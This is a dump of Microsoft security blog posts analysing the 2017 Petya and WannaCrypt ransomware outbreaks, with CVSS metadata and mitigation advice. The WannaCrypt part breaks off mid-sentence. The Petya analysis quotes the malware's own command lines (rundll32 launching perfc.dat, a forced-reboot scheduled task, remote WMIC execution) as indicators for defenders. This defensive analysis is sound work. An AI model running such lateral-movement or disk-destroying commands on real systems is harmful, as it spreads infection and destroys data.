Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n\n\n_Figure 5. Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including control flow-guard for kernel (kFCG), kernel mode code integrity (KMCI), better kernel address space layout randomization (KASLR), NX HAL, and PAGE POOL (non-executable kernel regions). These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. [Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-06T14:58:36", "title": "Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "modified": "2017-09-06T14:58:36", "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/", "id": "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T09:08:41", "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>). Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n\n\n\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n\n\nIt then displays this ransom note:\n\n\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n\n\n_Embedded RSA public key_\n\n\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offers machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares (UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, you customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be suggested for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy and execute a copy on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-28T06:57:43", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "modified": "2017-06-28T06:57:43", "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T09:08:41", "description": "_(Note: Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn May 12, there was a major outbreak of [WannaCrypt ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>). WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsar backdoor module leaked in April by a group calling itself Shadow Brokers.\n\nUsing ETERNALBLUE, WannaCrypt propagated as a worm on older platforms, particularly Windows 7 and Windows Server 2008 systems that haven't patched against the SMB1 vulnerability CVE-2017-0145. The resulting ransomware outbreak reached a large number of computers, even though Microsoft released security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to address the vulnerability on March 14, almost two months before the outbreak.\n\nThis post\u2014complementary to our earlier post about the [ETERNALBLUE and ETERNALROMANCE exploits released by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\u2014takes us through the WannaCrypt infection routine, providing even more detail about post-exploitation phases. It also describes other existing mitigations as well as new and upcoming mitigation and detection techniques provided by Microsoft to address similar threats.\n\n## Infection cycle\n\nThe following diagram summarizes the WannaCrypt infection cycle: initial shellcode execution, backdoor implantation and package upload, kernel and userland shellcode execution, and payload launch.\n\n\n\n_Figure 1. WannaCrypt infection cycle overview_\n\nThe file _mssecsvc.exe_ contains the main exploit code, which launches a network-level exploit and spawns the ransomware package. The exploit code targets a kernel-space vulnerability and involves multi-stage shellcode in both kernel and userland processes. Once the exploit succeeds, communication between the DoublePulsar backdoor module and _mssecsvc.exe_ is encoded using a pre-shared XOR key, allowing transmission of the main payload package and eventual execution of ransomware code.\n\n## Exploit and initial shellcodes\n\nIn an earlier [blog post](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), Viktor Brange provided a detailed analysis of the vulnerability trigger and the _instruction pointer_ control mechanism used by ETERNALBLUE. After the code achieves instruction pointer control, it focuses on acquiring persistence in kernel space using kernel shellcode and the DoublePulsar implant. It then executes the ransomware payload in user space.\n\n### Heap spray\n\nThe exploit code sprays memory on a target computer to lay out space for the first-stage shellcode. It uses non-standard SMB packet segments to make the allocated memory persistent on _hardware abstraction layer_ (HAL) memory space. It sends 18 instances of heap-spraying packets, which have direct binary representations of the first-stage shellcode.\n\n\n\n_Figure 2. Shellcode heap-spraying packet_\n\n### Initial shellcode execution: first and second stages\n\nThe exploit uses a _function-pointer overwrite _technique to direct control flow to the first-stage shellcode. This shellcode installs a second-stage shellcode as a _SYSENTER_ or _SYSCALL_ routine hook by overwriting _model-specific registers_ (MSRs). If the target system is x86-based, it hooks the SYSENTER routine by overwriting _IA32_SYSENTER_EIP_. On x64-based systems, it overwrites _IA32_LSTAR_ MSR to hook the SYSCALL routine. More information about these MSRs can be found in [Intel\u00ae 64 and IA-32 Architectures Software Developer's Manual Volume 3C](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf>).\n\n\n\n_Figure 3. First-stage shellcode for x86 systems_\n\nOriginally, the IA32_SYSENTER_EIP contains the address to _nt!KiFastCallEntry_ as its SYSENTER routine.\n\n\n\n_Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry_\n\nAfter modification by the first-stage shellcode, 